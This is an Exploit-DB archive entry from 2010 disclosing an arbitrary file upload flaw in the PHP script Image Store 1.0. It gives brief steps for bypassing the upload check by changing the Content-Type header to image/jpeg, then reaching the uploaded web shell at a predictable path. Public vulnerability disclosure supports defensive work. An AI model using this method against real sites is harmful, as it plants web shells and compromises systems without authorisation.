Image Store - Arbitrary File Upload

EDB-ID:

13782

CVE:

N/A

EDB Verified:

Author:

Mr.FireStormm

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-06-08

Vulnerable App:

============================================= ===================================
============================================= ======
                 Image Store Remote file Upload Vulnerability
============================================= ===================================
============================================= ======



############################################# ###################################
############################################# #######

# Name: Image Store V 1.0

# Date: 09-06-2010

# vendor: http://www.scriptidea.net/imagestore/

# Price: $199.00

# Discovered By: Mr.FireStormm

# Contact : Fire_stormm2003@hotmail.com

# MY Team : TeaM HacKer Egypt

# MY Web  : http://gaza-hacker.com/cc/
############################################# ###################################
############################################# ######


Hello every one 

STEP 1 :  upload shell.php

STEP 2 : useing live http headers and change (Content-Type) form Content-Type: application/octet-stream to

Content-Type: image/jpeg

ur shell uploded now http://www.site.com/imagestore/images/06-08-2010_shell.php

            Example 

http://www.scriptidea.net/imagestore/



Special Thanks To My Best FriendS : Dr.SiLnT HilL ,,,, Mr.Alsaeek 

############################################# ###################################
############################################# ######

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services